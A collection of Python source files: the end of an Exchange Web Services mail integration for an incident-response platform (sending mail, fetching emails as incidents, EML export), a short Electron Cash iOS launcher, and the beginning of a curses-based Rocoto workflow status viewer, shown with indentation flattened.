:param item_id: item ids to mark as junk
:param move_items: "yes" or "no" - to move or not to move to trash
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
move_items = move_items.lower() == "yes"
ews_result = MarkAsJunk(account=account).call(item_id=item_id, move_item=move_items)
mark_as_junk_result = {
ITEM_ID: item_id,
}
if ews_result == "Success":
mark_as_junk_result[ACTION] = "marked-as-junk"
else:
raise Exception("Failed mark-item-as-junk with error: " + ews_result)
readable_output = tableToMarkdown("Mark item as junk", mark_as_junk_result)
output = {CONTEXT_UPDATE_EWS_ITEM: mark_as_junk_result}
return readable_output, output, mark_as_junk_result
def get_items_from_folder(
client: EWSClient,
folder_path,
limit=100,
target_mailbox=None,
is_public=None,
get_internal_item="no",
):
"""
Retrieve items from folder path
:param client: EWS Client
:param folder_path: folder path
:param (Optional) limit: max amount of items to retrieve
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the folder public
:param (Optional) get_internal_item: should also retrieve internal items ("no" by default)
:return: Output tuple
"""
account = client.get_account(target_mailbox)
limit = int(limit)
get_internal_item = get_internal_item == "yes"
is_public = client.is_default_folder(folder_path, is_public)
folder = client.get_folder_by_path(folder_path, account, is_public)
qs = folder.filter().order_by("-datetime_created")[:limit]
items = get_limited_number_of_messages_from_qs(qs, limit)
items_result = []
for item in items:
item_attachment = parse_item_as_dict(
item, account.primary_smtp_address, camel_case=True, compact_fields=True
)
for attachment in item.attachments:
if (
get_internal_item
and isinstance(attachment, ItemAttachment)
and isinstance(attachment.item, Message)
):
# if an item attachment is found - switch to parsing the attached item
item_attachment = parse_item_as_dict(
attachment.item,
account.primary_smtp_address,
camel_case=True,
compact_fields=True,
)
break
items_result.append(item_attachment)
hm_headers = [
"sender",
"subject",
"hasAttachments",
"datetimeReceived",
"receivedBy",
"author",
"toRecipients",
"itemId",
]
readable_output = tableToMarkdown(
"Items in folder " + folder_path, items_result, headers=hm_headers
)
output = {CONTEXT_UPDATE_EWS_ITEM: items_result}
return readable_output, output, items_result
def get_items(client: EWSClient, item_ids, target_mailbox=None):
"""
Get items from target mailbox or client mailbox
:param client: EWS Client
:param item_ids: item ids to retrieve
:param (Optional) target_mailbox: target mailbox to retrieve items from
:return: Output tuple
"""
item_ids = argToList(item_ids)
account = client.get_account(target_mailbox)
items = client.get_items_from_mailbox(account, item_ids)
items = [x for x in items if isinstance(x, Message)]
items_as_incidents = [parse_incident_from_item(x) for x in items]
items_to_context = [
parse_item_as_dict(x, account.primary_smtp_address, True, True) for x in items
]
readable_output = tableToMarkdown(
"Get items", items_to_context, ITEMS_RESULTS_HEADERS
)
output = {
CONTEXT_UPDATE_EWS_ITEM: items_to_context,
"Email": [email_ec(item) for item in items],
}
return readable_output, output, items_as_incidents
def get_folder(client: EWSClient, folder_path, target_mailbox=None, is_public=None):
"""
Retrieve a folder from the target mailbox or client mailbox
:param client: EWS Client
:param folder_path: folder path to retrieve
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the folder public
:return: Output tuple
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(folder_path, is_public)
folder = folder_to_context_entry(
client.get_folder_by_path(folder_path, account=account, is_public=is_public)
)
readable_output = tableToMarkdown(f"Folder {folder_path}", folder)
output = {CONTEXT_UPDATE_FOLDER: folder}
return readable_output, output, folder
def folder_to_context_entry(f):
"""
Create a context entry from a folder response
:param f: folder response
:return: dict context entry
"""
try:
f_entry = {
"name": f.name,
"totalCount": f.total_count,
"id": f.id,
"childrenFolderCount": f.child_folder_count,
"changeKey": f.changekey,
}
if "unread_count" in [x.name for x in Folder.FIELDS]:
f_entry["unreadCount"] = f.unread_count
return f_entry
except AttributeError:
if isinstance(f, dict):
return {
"name": f.get("name"),
"totalCount": f.get("total_count"),
"id": f.get("id"),
"childrenFolderCount": f.get("child_folder_count"),
"changeKey": f.get("changekey"),
"unreadCount": f.get("unread_count"),
}
def mark_item_as_read(
client: EWSClient, item_ids, operation="read", target_mailbox=None
):
"""
Marks item as read
:param client: EWS Client
:param item_ids: items ids to mark as read
:param (Optional) operation: operation to execute ("read" or "unread")
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
marked_items = []
item_ids = argToList(item_ids)
items = client.get_items_from_mailbox(target_mailbox, item_ids)
items = [x for x in items if isinstance(x, Message)]
for item in items:
item.is_read = operation == "read"
item.save()
marked_items.append(
{
ITEM_ID: item.id,
MESSAGE_ID: item.message_id,
ACTION: "marked-as-{}".format(operation),
}
)
readable_output = tableToMarkdown(
f"Marked items ({operation} marked operation)", marked_items
)
output = {CONTEXT_UPDATE_EWS_ITEM: marked_items}
return readable_output, output, marked_items
def random_word_generator(length):
"""Generate a random string of given length
"""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
def handle_html(html_body):
"""
Extract all data-url content from within the html and return as separate attachments.
Due to security implications, we support only images here
We might not have Beautiful Soup so just do regex search
"""
attachments = []
clean_body = ''
last_index = 0
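# Find inline base64 images (<img src="data:image/...;base64,...">), turn each one into an attachment,
# and replace the data URI in the body with a cid: reference so the mail client can render it inline.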
for i, m in enumerate(
re.finditer(r'<img.+?src=\"(data:(image\/.+?);base64,([a-zA-Z0-9+/=\r\n]+?))\"', html_body, re.I)):
attachment = {
'data': base64.b64decode(m.group(3)),
'name': f'image{i}'
}
attachment['cid'] = f'{attachment["name"]}@{random_word_generator(8)}.{random_word_generator(8)}'
attachments.append(attachment)
clean_body += html_body[last_index:m.start(1)] + 'cid:' + attachment['cid']
last_index = m.end() - 1
clean_body += html_body[last_index:]
return clean_body, attachments
def collect_manual_attachments(manualAttachObj):
"""Collect all manual attachments' data
Args:
manualAttachObj (str): String representation of the manually attached files list.
Returns:
List[Dict]. List of the files data.
"""
manually_attached_objects = argToList(manualAttachObj)
attachments = []
for attachment in manually_attached_objects:
file_res = demisto.getFilePath(os.path.basename(attachment['RealFileName']))
path = file_res['path']
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': attachment['FileName'],
'data': data,
'cid': ''
})
return attachments
def collect_attachments(attachments_ids, attachments_cids, attachments_names):
"""Collect all attachments' data
Args:
attachments_ids (str): String representation of the files ids list.
attachments_cids (str): String representation of the files content ids list.
attachments_names (str): String representation of the files names list.
Returns:
List[Dict]. List of the files data.
"""
attachments = []
files_ids = argToList(attachments_ids)
files_cids = argToList(attachments_cids)
files_names = argToList(attachments_names)
for index, file_id in enumerate(files_ids):
try:
file_res = demisto.getFilePath(file_id)
path = file_res['path']
if len(files_names) > index and files_names[index]:
filename = files_names[index]
else:
filename = file_res['name']
if len(files_cids) > index and files_cids[index]:
cid = files_cids[index]
else:
cid = ''
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': filename,
'data': data,
'cid': cid
})
except Exception as e:
demisto.error(f'Invalid entry {file_id} with exception: {e}')
return_error(f'Entry {file_id} is not valid or is not a file entry')
return attachments
def handle_transient_files(transient_files, transient_files_contents, transient_files_cids):
"""Creates the transient attachments data
Args:
transient_files (str): String representation of the transient files names list.
transient_files_contents (str): String representation of the transient files content list.
transient_files_cids (str): String representation of the transient files content ids list.
Returns:
List[Dict]. List of the transient files data.
"""
transient_attachments = []
files_names = argToList(transient_files)
files_contents = argToList(transient_files_contents)
files_cids = argToList(transient_files_cids)
for index in range(len(files_names)):
file_name = files_names[index]
if index >= len(files_contents):
break
file_content = bytes(files_contents[index], UTF_8)
if index >= len(files_cids):
file_cid = ''
else:
file_cid = files_cids[index]
transient_attachments.append({
'name': file_name,
'data': file_content,
'cid': file_cid
})
return transient_attachments
def handle_template_params(template_params):
"""Translates the template params if they exist from the context
Args:
template_params (str): JSON string that represent the variables names to be replaced and the desired value.
Value can be either real value or context key to fetch the value from.
Returns:
Dict. `variable_name: value_to_use` of the templated parameters.
"""
actual_params = {}
if template_params:
try:
params = json.loads(template_params)
for p in params:
if params[p].get('value'):
actual_params[p] = params[p]['value']
elif params[p].get('key'):
actual_params[p] = demisto.dt(demisto.context(), params[p]['key'])
except ValueError as e:
return_error('Unable to parse template_params: %s' % (str(e)))
return actual_params
def create_message_object(to, cc, bcc, subject, body, additional_headers):
"""Creates the message object according to the existence of additional custom headers.
"""
if additional_headers:
return Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
subject=subject,
body=body,
**additional_headers
)
return Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
subject=subject,
body=body
)
def create_message(to, subject='', body='', bcc=None, cc=None, html_body=None, attachments=None,
additional_headers=None):
"""Creates the Message object that will be sent.
Args:
to (list): Main recipients.
cc (list): CC recipients.
bcc (list): BCC recipients.
subject (str): Email's subject.
body (str): Email's simple text body.
html_body (str): Email's html body.
attachments (list): Files to be attached to the mail, both inline and as files.
additional_headers (Dict): Custom headers to be added to the message.
Returns:
Message. Message object ready to be sent.
"""
if not html_body:
# This is a simple text message - we cannot have CIDs here
message = create_message_object(to, cc, bcc, subject, body, additional_headers)
for attachment in attachments:
if not attachment.get('cid'):
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'))
message.attach(new_attachment)
else:
html_body, html_attachments = handle_html(html_body)
attachments += html_attachments
message = create_message_object(to, cc, bcc, subject, HTMLBody(html_body), additional_headers)
for attachment in attachments:
if not attachment.get('cid'):
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'))
else:
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'),
is_inline=True, content_id=attachment.get('cid'))
message.attach(new_attachment)
return message
def add_additional_headers(additional_headers):
"""Adds custom headers to the Message object
Args:
additional_headers (str): Headers list as string. Example: headerName1=headerValue1,headerName2=headerValue2
Returns:
Dict. Headers dictionary in the form of: `header_name: header value`
"""
headers = dict()
for header in argToList(additional_headers):
header_name, header_value = header.split('=', 1)
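# exchangelib exposes custom internet headers via ExtendedProperty subclasses; each header name has to be
# registered on Message once (a repeated registration raises ValueError, which is only logged below).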
class TempClass(ExtendedProperty):
distinguished_property_set_id = 'InternetHeaders'
property_name = header_name
property_type = 'String'
try:
Message.register(header_name, TempClass)
headers[header_name] = header_value
except ValueError as e:
demisto.debug('EWSO365 - Header ' + header_name + ' could not be registered. ' + str(e))
return headers
def send_email(client: EWSClient, to, subject='', body="", bcc=None, cc=None, htmlBody=None,
attachIDs="", attachCIDs="", attachNames="", manualAttachObj=None,
transientFile=None, transientFileContent=None, transientFileCID=None, templateParams=None,
additionalHeader=None, raw_message=None):
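# A typical (hypothetical) War Room invocation would look like:
#   !send-mail to=user@example.com subject="Test" body="Hello" attachIDs=<file entry id>
# Everything except at least one recipient is optional.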
to = argToList(to)
cc = argToList(cc)
bcc = argToList(bcc)
# Basic validation - we allow pretty much everything but you have to have at least a recipient
# We allow messages without subject and also without body
if not to and not cc and not bcc:
return_error('You must have at least one recipient')
if raw_message:
message = Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
body=raw_message
)
else:
if additionalHeader:
additionalHeader = add_additional_headers(additionalHeader)
# collect all types of attachments
attachments = collect_attachments(attachIDs, attachCIDs, attachNames)
attachments.extend(collect_manual_attachments(manualAttachObj))
attachments.extend(handle_transient_files(transientFile, transientFileContent, transientFileCID))
# update body and html_body with the templated params, if exists
template_params = handle_template_params(templateParams)
if template_params:
body = body.format(**template_params)
if htmlBody:
htmlBody = htmlBody.format(**template_params)
message = create_message(to, subject, body, bcc, cc, htmlBody, attachments, additionalHeader)
client.send_email(message)
return 'Mail sent successfully', {}, {}
def get_item_as_eml(client: EWSClient, item_id, target_mailbox=None):
"""
Retrieve item as an eml
:param client: EWS Client
:param item_id: Item id to retrieve
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
item = client.get_item_from_mailbox(account, item_id)
if item.mime_content:
mime_content = item.mime_content
if isinstance(mime_content, bytes):
email_content = email.message_from_bytes(mime_content)
else:
email_content = email.message_from_string(mime_content)
if item.headers:
attached_email_headers = [
(h, " ".join(map(str.strip, v.split("\r\n"))))
for (h, v) in list(email_content.items())
]
for header in item.headers:
if (
header.name,
header.value,
) not in attached_email_headers and header.name != "Content-Type":
email_content.add_header(header.name, header.value)
eml_name = item.subject if item.subject else "demisto_untitled_eml"
file_result = fileResult(eml_name + ".eml", email_content.as_string())
file_result = (
file_result if file_result else "Failed uploading eml file to war room"
)
return file_result
def parse_incident_from_item(item):
"""
Parses an incident from an item
:param item: item to parse
:return: Parsed item
"""
incident = {}
labels = []
try:
incident["details"] = item.text_body or item.body
except AttributeError:
incident["details"] = item.body
incident["name"] = item.subject
labels.append({"type": "Email/subject", "value": item.subject})
incident["occurred"] = item.datetime_created.ewsformat()
# handle recipients
if item.to_recipients:
for recipient in item.to_recipients:
labels.append({"type": "Email", "value": recipient.email_address})
# handle cc
if item.cc_recipients:
for recipient in item.cc_recipients:
labels.append({"type": "Email/cc", "value": recipient.email_address})
# handle email from
if item.sender:
labels.append({"type": "Email/from", "value": item.sender.email_address})
# email format
email_format = ""
try:
if item.text_body:
labels.append({"type": "Email/text", "value": item.text_body})
email_format = "text"
except AttributeError:
pass
if item.body:
labels.append({"type": "Email/html", "value": item.body})
email_format = "HTML"
labels.append({"type": "Email/format", "value": email_format})
# handle attachments
if item.attachments:
incident["attachment"] = []
for attachment in item.attachments:
file_result = None
label_attachment_type = None
label_attachment_id_type = None
if isinstance(attachment, FileAttachment):
try:
if attachment.content:
# file attachment
label_attachment_type = "attachments"
label_attachment_id_type = "attachmentId"
# save the attachment
file_name = get_attachment_name(attachment.name)
file_result = fileResult(file_name, attachment.content)
# check for error
if file_result["Type"] == entryTypes["error"]:
demisto.error(file_result["Contents"])
raise Exception(file_result["Contents"])
# save attachment to incident
incident["attachment"].append(
{
"path": file_result["FileID"],
"name": get_attachment_name(attachment.name),
}
)
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
continue
else:
# other item attachment
label_attachment_type = "attachmentItems"
label_attachment_id_type = "attachmentItemsId"
# save the attachment
if attachment.item.mime_content:
mime_content = attachment.item.mime_content
attached_email = email.message_from_bytes(mime_content) if isinstance(mime_content, bytes) \
else email.message_from_string(mime_content)
if attachment.item.headers:
attached_email_headers = [
(h, " ".join(map(str.strip, v.split("\r\n"))))
for (h, v) in list(attached_email.items())
]
for header in attachment.item.headers:
if (
(header.name, header.value)
not in attached_email_headers
and header.name != "Content-Type"
):
attached_email.add_header(header.name, header.value)
attached_email_bytes = attached_email.as_bytes()
chardet_detection = chardet.detect(attached_email_bytes)
encoding = chardet_detection.get('encoding', 'utf-8') or 'utf-8'
try:
# Trying to decode using the detected encoding
data = attached_email_bytes.decode(encoding)
except UnicodeDecodeError:
# In case the detected encoding fails apply the default encoding
demisto.info(f'Could not decode attached email using detected encoding:{encoding}, retrying '
f'using utf-8.\nAttached email:\n{attached_email}')
data = attached_email_bytes.decode('utf-8')
file_result = fileResult(
get_attachment_name(attachment.name) + ".eml",
data,
)
if file_result:
# check for error
if file_result["Type"] == entryTypes["error"]:
demisto.error(file_result["Contents"])
raise Exception(file_result["Contents"])
# save attachment to incident
incident["attachment"].append(
{
"path": file_result["FileID"],
"name": get_attachment_name(attachment.name) + ".eml",
}
)
labels.append(
{
"type": label_attachment_type,
"value": get_attachment_name(attachment.name),
}
)
labels.append(
{"type": label_attachment_id_type, "value": attachment.attachment_id.id}
)
# handle headers
if item.headers:
headers = []
for header in item.headers:
labels.append(
{
"type": "Email/Header/{}".format(header.name),
"value": str(header.value),
}
)
headers.append("{}: {}".format(header.name, header.value))
labels.append({"type": "Email/headers", "value": "\r\n".join(headers)})
# handle item id
if item.message_id:
labels.append({"type": "Email/MessageId", "value": str(item.message_id)})
if item.id:
labels.append({"type": "Email/ID", "value": item.id})
labels.append({"type": "Email/itemId", "value": item.id})
# handle conversation id
if item.conversation_id:
labels.append({"type": "Email/ConversionID", "value": item.conversation_id.id})
incident["labels"] = labels
incident["rawJSON"] = json.dumps(parse_item_as_dict(item, None), ensure_ascii=False)
return incident
def fetch_emails_as_incidents(client: EWSClient, last_run):
"""
Fetch incidents
:param client: EWS Client
:param last_run: last run dict
:return: list of incidents
"""
last_run = get_last_run(client, last_run)
try:
last_emails = fetch_last_emails(
client,
client.folder_name,
last_run.get(LAST_RUN_TIME),
last_run.get(LAST_RUN_IDS),
)
ids = deque(
last_run.get(LAST_RUN_IDS, []), maxlen=client.last_run_ids_queue_size
)
incidents = []
incident: Dict[str, str] = {}
for item in last_emails:
if item.message_id:
ids.append(item.message_id)
incident = parse_incident_from_item(item)
incidents.append(incident)
if len(incidents) >= client.max_fetch:
break
last_run_time = incident.get("occurred", last_run.get(LAST_RUN_TIME))
if isinstance(last_run_time, EWSDateTime):
last_run_time = last_run_time.ewsformat()
new_last_run = {
LAST_RUN_TIME: last_run_time,
LAST_RUN_FOLDER: client.folder_name,
LAST_RUN_IDS: list(ids),
ERROR_COUNTER: 0,
}
demisto.setLastRun(new_last_run)
return incidents
except RateLimitError:
if isinstance(last_run.get(LAST_RUN_TIME), EWSDateTime):
last_run[LAST_RUN_TIME] = last_run[LAST_RUN_TIME].ewsformat()
if ERROR_COUNTER not in last_run:
last_run[ERROR_COUNTER] = 0
last_run[ERROR_COUNTER] += 1
demisto.setLastRun(last_run)
if last_run[ERROR_COUNTER] > 2:
raise
return []
def fetch_last_emails(
client: EWSClient, folder_name="Inbox", since_datetime=None, exclude_ids=None
):
"""
Fetches last emails
:param client: EWS client
:param (Optional) folder_name: folder name to pull from
:param (Optional) since_datetime: items will be searched after this datetime
:param (Optional) exclude_ids: exclude ids from fetch
:return: list of exchangelib.Items
"""
qs = client.get_folder_by_path(folder_name, is_public=client.is_public_folder)
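# On the first fetch there is no saved checkpoint: fall back to FETCH_TIME and filter on last_modified_time;
# later fetches filter on datetime_received using the checkpoint from the previous run.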
if since_datetime:
qs = qs.filter(datetime_received__gte=since_datetime)
else:
tz = EWSTimeZone.timezone('UTC')
first_fetch_datetime = dateparser.parse(FETCH_TIME)
first_fetch_ews_datetime = EWSDateTime.from_datetime(tz.localize(first_fetch_datetime))
qs = qs.filter(last_modified_time__gte=first_fetch_ews_datetime)
qs = qs.filter().only(*[x.name for x in Message.FIELDS])
qs = qs.filter().order_by("datetime_received")
result = []
for item in qs:
if isinstance(item, Message):
result.append(item)
if len(result) >= client.max_fetch:
break
if exclude_ids and len(exclude_ids) > 0:
exclude_ids = set(exclude_ids)
result = [x for x in result if x.message_id not in exclude_ids]
return result
def test_module(client: EWSClient, max_fetch):
"""
test-module
* Max incidents per fetch <= MAX_INCIDENTS_PER_FETCH
* Account can be retrieved
* Account has read rights
* Test access to fetch folder
:param client: EWS Client
:param max_fetch: Max incidents per fetch
:return: "ok"
"""
try:
if int(max_fetch) > MAX_INCIDENTS_PER_FETCH:
return_error(f'Error - Max incidents per fetch cannot be greater than {MAX_INCIDENTS_PER_FETCH}. '
f'You provided: {max_fetch}')
account = client.get_account()
if not account.root.effective_rights.read: # pylint: disable=E1101
raise Exception(
"Success to authenticate, but user has no permissions to read from the mailbox. "
"Need to delegate the user permissions to the mailbox - "
"please read integration documentation and follow the instructions"
)
client.get_folder_by_path(
client.folder_name, account, client.is_public_folder
).test_access()
except ErrorFolderNotFound as e:
if "Top of Information Store" in str(e):
raise Exception(
"Success to authenticate, but user probably has no permissions to read from the specific folder."
"Check user permissions. You can try !ews-find-folders command to "
"get all the folders structure that the user has permissions to"
)
return "ok"
def sub_main():
is_test_module = False
params = demisto.params()
args = prepare_args(demisto.args())
# client's default_target_mailbox is the authorization source for the instance
params['default_target_mailbox'] = args.get('target_mailbox',
args.get('source_mailbox', params['default_target_mailbox']))
client = EWSClient(**params)
start_logging()
try:
command = demisto.command()
# commands that return a single note result
normal_commands = {
"ews-get-searchable-mailboxes": get_searchable_mailboxes,
"ews-move-item-between-mailboxes": move_item_between_mailboxes,
"ews-move-item": move_item,
"ews-delete-items": delete_items,
"ews-search-mailbox": search_items_in_mailbox,
"ews-get-contacts": get_contacts,
"ews-get-out-of-office": get_out_of_office_state,
"ews-recover-messages": recover_soft_delete_item,
"ews-create-folder": create_folder,
"ews-mark-item-as-junk": mark_item_as_junk,
"ews-find-folders": find_folders,
"ews-get-items-from-folder": get_items_from_folder,
"ews-get-items": get_items,
"ews-get-folder": get_folder,
"ews-expand-group": get_expanded_group,
"ews-mark-items-as-read": mark_item_as_read,
"send-mail": send_email,
}
# commands that may return multiple results or non-note result
special_output_commands = {
"ews-get-attachment": fetch_attachments_for_message,
"ews-delete-attachment": delete_attachments_for_message,
"ews-get-items-as-eml": get_item_as_eml,
}
# system commands:
if command == "test-module":
is_test_module = True
demisto.results(test_module(client, params.get('max_fetch')))
elif command == "fetch-incidents":
last_run = demisto.getLastRun()
incidents = fetch_emails_as_incidents(client, last_run)
demisto.incidents(incidents)
# special outputs commands
elif command in special_output_commands:
demisto.results(special_output_commands[command](client, **args)) # type: ignore[operator]
# normal commands
else:
output = normal_commands[command](client, **args) # type: ignore[operator]
return_outputs(*output)
except Exception as e:
start_logging()
debug_log = log_stream.getvalue() # type: ignore[union-attr]
error_message_simple = ""
# Office365 regular maintenance case
if isinstance(e, ErrorMailboxStoreUnavailable) or isinstance(
e, ErrorMailboxMoveInProgress
):
log_message = (
"Office365 is undergoing load balancing operations. "
"As a result, the service is temporarily unavailable."
)
if demisto.command() == "fetch-incidents":
demisto.info(log_message)
demisto.incidents([])
sys.exit(0)
if is_test_module:
demisto.results(
log_message + " Please retry the instance configuration test."
)
sys.exit(0)
error_message_simple = log_message + " Please retry your request."
if isinstance(e, ConnectionError):
error_message_simple = (
"Could not connect to the server.\n"
f"Additional information: {str(e)}"
)
else:
if is_test_module and isinstance(e, MalformedResponseError):
error_message_simple = (
"Got invalid response from the server.\n"
)
# Legacy error handling
if "Status code: 401" in debug_log:
error_message_simple = (
"Got unauthorized from the server. "
)
if "Status code: 503" in debug_log:
error_message_simple = (
"Got timeout from the server. "
"Probably the server is not reachable with the current settings. "
)
if not error_message_simple:
error_message = error_message_simple = str(e)
else:
error_message = error_message_simple + "\n" + str(e)
stacktrace = traceback.format_exc()
if stacktrace:
error_message += "\nFull stacktrace:\n" + stacktrace
if debug_log:
error_message += "\nFull debug log:\n" + debug_log
if demisto.command() == "fetch-incidents":
raise
if demisto.command() == "ews-search-mailbox" and isinstance(e, ValueError):
return_error(
message="Selected invalid field, please specify valid field name.",
error=e,
)
if is_test_module:
demisto.results(error_message_simple)
else:
demisto.results(
{
"Type": entryTypes["error"],
"ContentsFormat": formats["text"],
"Contents": error_message_simple,
}
)
demisto.error(f"{e.__class__.__name__}: {error_message}")
finally:
exchangelib_cleanup()
if log_stream:
try:
logging.getLogger().removeHandler(log_handler) # type: ignore
log_stream.close()
except Exception as ex:
demisto.error(
"EWS: unexpected exception when trying to remove log handler: {}".format(
ex
)
)
def process_main():
"""setup stdin to fd=0 so we can read from the server"""
sys.stdin = os.fdopen(0, "r")
sub_main()
def main():
    # When running big queries, like 'ews-search-mailbox', the memory might not be freed by the garbage
    # collector. The `separate_process` flag runs the integration in a separate process, which prevents
    # memory leakage.
separate_process = demisto.params().get("separate_process", False)
demisto.debug("Running as separate_process: {}".format(separate_process))
if separate_process:
try:
p = Process(target=process_main)
p.start()
p.join()
except Exception as ex:
demisto.error("Failed starting Process: {}".format(ex))
else:
sub_main()
from MicrosoftApiModule import * # noqa: E402
if __name__ in ("__main__", "__builtin__", "builtins"):
main()
|
app.py
|
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
#
import os
from electroncash_gui.ios_native.monkeypatches import MonkeyPatches
from electroncash.util import set_verbosity
from electroncash_gui.ios_native import ElectrumGui
from electroncash_gui.ios_native.utils import call_later, get_user_dir, cleanup_tmp_dir, is_debug_build, NSLogSuppress, NSLog
from electroncash.simple_config import SimpleConfig
# NB: This is called from appdelegate.py "application_didFinishLaunchingWithOptions_"
def main():
cleanup_tmp_dir()
config_options = {
'verbose': is_debug_build(),
'cmd': 'gui',
'gui': 'ios_native',
'cwd': os.getcwd(),
        'whitelist_servers_only' : True, # on iOS we force only the whitelist ('preferred') servers for now, as a security measure
}
set_verbosity(config_options.get('verbose'), timestamps=False, thread_id=False)
NSLogSuppress(not config_options.get('verbose'))
MonkeyPatches.patch()
config = SimpleConfig(config_options, read_user_dir_function = get_user_dir)
gui = ElectrumGui(config)
call_later(0.010, gui.main) # this is required for the activity indicator to actually animate. Switch to a direct call if not using activity indicator on Splash2
_printStats(config_options) # Prints some startup/debug stats such as Python version and SSL version (this is done in another thread to hopefully not impact startup overhead too much, as importing ssl may be a bit heavy)
return "Vitae FTW!"
def _printStats(config_options):
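    """Log library, Python, and OpenSSL version information from a daemon thread so app startup is not delayed."""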
import threading
def thrdfunc(config_options):
# lazy init of SSL
import ssl, sys
from electroncash import version
NSLog("ViLight lib version: %s (using server protocol: %s)", version.PACKAGE_VERSION, version.PROTOCOL_VERSION)
NSLog("Python version: %s", ' '.join(sys.version.split('\n')))
NSLog("OpenSSL version: %s", ssl.OPENSSL_VERSION)
#NSLog("Environment Vars:")
#for k,v in os.environ.copy().items():
# NSLog("%s=%s", str(k), str(v))
#NSLog("Config Vars:")
#for k,v in config_options.copy().items():
# NSLog("config[%s] = %s", str(k), str(v))
# /
# We do this from a thread so as to not delay app startup by importing more stuff we don't strictly need.
threading.Thread(target=thrdfunc, args=(config_options,), daemon=True).start()
|
rocoto_viewer.py
|
#!/usr/bin/env python
#
##@namespace rocoto_viewer
# @brief A Curses based terminal viewer to interact and display the status of a Rocoto Workflow in real time.
#
# @anchor rocoto_viewer
## This Python script allows users to see and interact with a running Rocoto Workflow in real time.
# \image html pythonCurses.jpeg "Rocoto Viewer for Displaying Real-time Status of Workflow"
#
# To launch this viewer simply give it the database and the XML files being used by the \b Rocoto system for your experiment:
#
# rocoto_viewer.py -w my_gfs-workflow.xml -d my_database.db
#
# The script is located in the directory para/exp/rocoto/rocotoviewers/rocotoviewer_curses/rocoto_viewer.py
# The viewer will continuously update every four minutes and reflect the current status of your workflow. You may use your mouse or arrow keys to select a particular task and view its status details by pressing the key \p c as indicated by \b \<c\> (which runs \b rocotocheck), or perform a \b rocotorewind by pressing \b \<r\> to restart the workflow at that point. Running \b rocotorewind clears the state information of that task from the database and resubmits the job to the scheduler.
#
# Tasks marked with the \b \< symbol are \b metatasks and can be expanded by highlighting that task with the mouse and then clicking on the \b \< symbol, which then changes to \b \> . You can then click on the \b \> symbol to collapse it again. Alternatively, you can press the 'x' key to expand and collapse the selected metatask.
#
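# For example, to write a static HTML status page instead of running the interactive curses viewer (per the
# --html option handled below; the value is used as the output directory, or user@host:/path to have the files rsync'd there):
#
#   rocoto_viewer.py -w my_gfs-workflow.xml -d my_database.db --html=/path/to/output_dir
#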
##@cond ROCOTO_VIEWER_CURSES
from __future__ import division
import curses
import os, sys, getpass, getopt, signal, tempfile
from os.path import basename
import subprocess
from math import *
from __builtin__ import any as b_any
from os.path import realpath, normpath, dirname, getsize
from io import StringIO
from itertools import groupby
from time import time
from multiprocessing import Process, Queue
import time as std_time
from datetime import datetime, timedelta
import uuid
import shutil
import sqlite3,datetime,collections
import xml.etree.ElementTree as ET
import cPickle
try:
from dateutil.relativedelta import relativedelta
except ImportError:
#print 'dateutil which uses relativedelta to increment monthly (used by UGCS) is not supported with this version of python. Use Anaconda the native version in /user/bin'
#sys.exit(1)
pass
# Global Variables
database_file_agmented = None
use_performance_metrics = False
default_column_length = 125
stat_read_time_delay = 3*60
temp_workflow_file = ''
header_string = ''
format_string = "jobid slots submit_time start_time cpu_used run_time delimiter=';'"
ccs_html='''
<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="180">
<style type="text/css">
thead { font-weight:bold; }
red { background-color:red }
blue { background-color:lightblue }
green { background-color:lightgreen }
yellow { background-color:yellow }
td, th {
border: 2px solid #999;
padding: 0.5rem;
}
table {
border-collapse: collapse;
}
</style>
</head>
'''
bottom_message_scroll = '<c>heck <b>oot <r>ewind <R>un (->) Next Cycle (<-) Previous Cycle <u>p <d>own <h>elp <Q>uit'
bottom_message = '<c>heck <b>oot <r>ewind <R>un (->) Next Cycle (<-) Previous Cycle <h>elp <Q>uit'
#Global Variables
#================
list_tasks = False
html_output = False
html_output_file = None
rzdm_path = ''
only_check_point = False
save_checkfile_path = None
use_multiprocessing = True
get_user = getpass.getuser()
screen_resized = False
debug = None
mlines = 0
mcols = 0
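# SIGWINCH handler: re-read the terminal size via 'stty size' and flag that the screen needs to be redrawn.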
def sigwinch_handler(signum, frame):
global screen_resized
global mlines
global mcols
term_size = subprocess.Popen(['stty', 'size'], stdout=subprocess.PIPE)
try:
get_term_size, err = term_size.communicate()
except:
return
mlines,mcols = map(int,get_term_size.split())
screen_resized = True
def usage(message=None):
curses.endwin()
print>>sys.stderr, '''
Usage: rocoto_viewer.py -w workflow.xml -d database.db [--listtasks]\n [--html=filename.html]\n [--perfmetrics={True,False}]
Mandatory arguments:
-w workflow.xml
-d database.db
Optional arguments:
--listtasks --- print out a list of all tasks
--html=filename.html --- creates an HTML document of status
--perfmetrics=True --- turn on/off extra columns for performance metrics
--help --- print this usage message'''
if message is not None:
print>>sys.stderr,'\n'+str(message).rstrip()+'\n'
sys.exit(-1)
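# Add a jobs_augment table (a copy of jobs plus qtime/cputime/runtime/slots columns) to the Rocoto database
# so extra performance metrics can be stored alongside the normal job records.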
def augment_SQLite3(filename):
connection=sqlite3.connect(filename)
c=connection.cursor()
#qinfo=c.execute("DROP TABLE IF EXISTS jobs_augment;")
qinfo=c.execute("PRAGMA table_info(jobs_augment)").fetchall()
if any('qtime' in element for element in qinfo):
c.close()
return 'is_already_augmented'
else:
sql_create_augment_table = "CREATE TABLE jobs_augment AS SELECT * FROM jobs;"
